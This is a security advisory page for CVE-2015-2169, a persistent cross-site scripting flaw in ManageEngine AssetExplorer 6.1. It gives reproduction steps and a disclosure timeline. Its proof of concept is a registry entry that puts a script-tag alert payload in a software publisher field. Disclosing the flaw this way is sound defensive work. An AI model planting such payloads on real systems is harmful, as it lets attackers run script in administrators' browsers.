ManageEngine Asset Explorer 6.1 Cross Site Scripting

🗓️ 24 Jun 2015 00:00:00Reported by Suraj KrishnaswamiType

packetstorm🔗 packetstormsecurity.com👁 37 Views

ManageEngine AssetExplorer v6.1 XSS Vulnerability, affects software for IT asset management

Reporter	Title	Published	Views	Family All 11
0day.today	ManageEngine Asset Explorer 6.1 Cross Site Scripting Vulnerability	25 Jun 201500:00	–	zdt
CNVD	ZOHO ManageEngine AssetExplorer Cross-Site Scripting Vulnerability	26 Jun 201500:00	–	cnvd
CVE	CVE-2015-2169	24 Jun 201514:00	–	cve
Cvelist	CVE-2015-2169	24 Jun 201514:00	–	cvelist
Exploit DB	ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting	26 Jun 201500:00	–	exploitdb
EUVD	EUVD-2015-2278	7 Oct 202500:30	–	euvd
exploitpack	ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting	26 Jun 201500:00	–	exploitpack
Tenable Nessus	ManageEngine AssetExplorer < 6.1.0 Build 6113 Multiple XSS	9 Nov 201500:00	–	nessus
NVD	CVE-2015-2169	24 Jun 201514:59	–	nvd
OpenVAS	ManageEngine AssetExplorer Multiple Cross Site Scripting Vulnerabilities	24 Jun 201500:00	–	openvas

`Title:  
===============  
ManageEngine Asset Explorer v6.1 - XSS Vulnerability  
  
  
CVE-ID:  
====================================  
CVE-2015-2169  
  
  
CVSS:  
====================================  
3.5  
  
  
Product & Service Introduction (Taken from their homepage):  
====================================  
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)  
software that helps you monitor and manage assets in your network from  
Planning phase to Disposal phase. AssetExplorer provides you with a number  
of ways to ensure discovery of all the assets in your network. You can  
manage software & hardware assets, ensure software license compliance and  
track purchase orders & contracts - the whole nine yards! AssetExplorer is  
very easy to install and works right out of the box.  
  
(Homepage: https://www.manageengine.com/products/asset-explorer/ )  
  
  
Abstract Advisory Information:  
==============================  
Cross site scripting attack can be performed on the manage engine asset  
explorer. If the 'publisher' name contains vulnerable script, it gets  
executed in the browser.  
  
  
Affected Products:  
====================  
Manage Engine  
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)  
  
  
Severity Level:  
====================  
Medium  
  
  
Technical Details & Description:  
================================  
Add a vendor with a script in it to the registry.  
Login to the product,  
Scan the endpoint where the registry is modified.  
In the right pane, go to software->Scanned Software  
  
The script gets executed.  
  
Vulnerable Product(s):  
ManageEngine Asset Explorer  
  
Affected Version(s):  
Version 6.1.0 / Build Number 6112  
(Earlier versions i did not test)  
  
Vulnerability Type(s):  
Persistent Cross Site Scripting  
  
  
PoC:  
=======================  
Add the following registry entry in the machine, for targeted attack.  
  
Windows Registry Editor Version 5.00  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]  
"DisplayName"="A fake software 2 installed"  
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"  
"DisplayVersion"="0.500.20"  
"URLInfoAbout"="http://www.dummy.org"  
"Publisher"="<script> alert(\"XSS\"); </script>"  
  
  
Security Risk:  
==================  
Medium.  
  
  
Credits & Authors:  
==================  
Suraj Krishnaswami ([email protected])  
  
  
Timeline:  
==================  
Discovered at Wed, March 3, 2015  
Informed manage engine about the vulnerability: March 4, 2015  
Case moved to development team: March 4, 2015  
Asked for updates: March 9, 2015  
Asked for updates: March 13, 2015  
Asked for updates: April 14, 2015  
Public Disclosure at Mon, June 22, 2015  
  
  
`

24 Jun 2015 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.04123